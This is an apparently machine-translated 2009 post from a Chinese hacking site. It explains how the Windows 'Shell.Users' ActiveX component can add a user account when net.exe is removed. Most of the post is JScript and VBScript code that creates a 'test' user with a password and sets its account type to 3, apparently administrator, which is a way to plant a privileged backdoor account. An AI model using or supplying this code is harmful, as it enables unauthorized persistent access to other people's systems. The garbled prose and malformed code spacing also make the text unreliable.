The use of components plus the user-to vulnerability and early warning-the black bar safety net

ID MYHACK58:62200924589
Type myhack58
Reporter 佚名
Modified 2009-09-08T00:00:00



Today research about the user control panel file nusrmgr. cpl, the discovery call is to the Shell. Users to add users, it also simultaneously calls the wscript. shell, Shell. Application, Shell. LocalMachine these three components. But added to the user while this one Shell. Users is sufficient. So maybe in the deleted net. exe and not the adsi, it may also be a new user of the method. The code is as follows:


var o=new ActiveXObject( "Shell. Users" ); z=o. create("test") ; z. changePassword("1 2 3 4 5 6","") z. setting("AccountType")=3;


Set o=CreateObject( "Shell. Users" ) Set z=o. create("test") z. changePassword "1 2 3 4 5 6","" z. setting("AccountType")=3